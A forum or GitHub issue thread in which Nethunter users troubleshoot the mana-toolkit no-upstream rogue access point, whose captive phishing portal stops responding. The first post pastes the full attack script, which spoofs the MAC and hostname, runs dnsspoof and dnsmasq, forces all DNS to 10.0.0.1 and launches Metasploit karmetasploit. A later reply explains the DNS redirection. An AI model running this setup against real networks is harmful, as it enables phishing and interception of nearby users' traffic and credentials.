No redirect/access to capitve portal.

[HeavensWing]

I'm running Nethunter on an S7E with TL-722n.

When running start-noupstream.sh everything seems fine, the AP comes up and everything as it should. For a short period of time, I can connect with my laptop and hit an http site and be redirected to my captive portal. This all has to be done within about 5-10 seconds. After that AP shows "No internet connectivity" on the laptop and I can't reach the site even by using the 10.0.0.1 address. I can't ping the gateway either.

I cleared all the iptables thinking that an incoming connection was being blocked yet it didn't help.

I setup the same exact test in a VM on my laptop and everything works fine, so I don't know what's stopping my phone from working.

What is also strange, if I connect to the AP via my phone (same device as I'm running the test.) I can reach the page using the address 10.0.0.1.

/usr/share/mana-toolkit/run-mana/start-noupstream.sh
::::::::::::::
#!/bin/bash

phy=wlan1
conf=/etc/mana-toolkit/hostapd-mana.conf
hostapd=/usr/lib/mana-toolkit/hostapd

hostname WRT54G
echo hostname WRT54G
sleep 2

service network-manager stop
rfkill unblock wlan

ifconfig $phy down
macchanger -r $phy
ifconfig $phy up

sed -i "s/^interface=.$/interface=$phy/" $conf
sed -i "s/^set INTERFACE .$/set INTERFACE $phy/" /etc/mana-toolkit/karmetasploit.rc
$hostapd $conf&
sleep 5
ifconfig $phy 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf&
dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy
dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy

dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy
dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf&
service apache2 start
stunnel4 /etc/mana-toolkit/stunnel.conf
tinyproxy -c /etc/mana-toolkit/tinyproxy.conf&
msfconsole -r /etc/mana-toolkit/karmetasploit.rc&

echo '1' > /proc/sys/net/ipv4/ip_forward
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -t nat -F
iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

echo "Hit enter to kill me"
read
pkill hostapd
pkill dnsmasq
pkill dnsspoof
pkill tinyproxy
pkill stunnel4
pkill ruby
service apache2 stop
iptables -t nat -F

[sku77]

same with me can you help us with this I am runnin it also on Nethunter . i can connect to the phone but cant ping the captive portal 10.0.0.1
thanks in advance.

[tanc7]

Hey I am not the dev who made this but from some debugging, I noticed there is a issue with the DNS redirection. At least you managed to get the IP leases fixed. I am assuming you are running the /usr/share/mana-toolkit/run-mana/start-noupstream.sh

By default it is supposed to use DNSMasq and Metasploit's FakeDNS module for the redirection. It tells msfconsole to run this file /etc/mana-toolkit/karmetasploit.rc

It already has the proper pointers, basically saying "all traffic from DNS requests goes to 10.0.0.1", or "phishing page".

The pointer is here: dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf inside of the file: /usr/share/mana-toolkit/run-mana/start-noupstream.sh

The file is located here: /etc/mana-toolkit/dnsspoof.conf

It does the same thing, again, in Metasploit with the auxiliary/server/fakedns module. But in the latest version of the karmetasploit resource script, it appears it got commented out. 8c0286c

I been trying other methods, like attempting to use DNSChef instead. But then it locks out DNSMasq because its fighting for the same port and host.

However, the with-uplink attack works perfectly, but using the no-uplink attack with a captive phishing portal seems to have DNS issues. I tried running "host", "nslookup", and "dig" and it keeps resolving to the real legitimate IP address.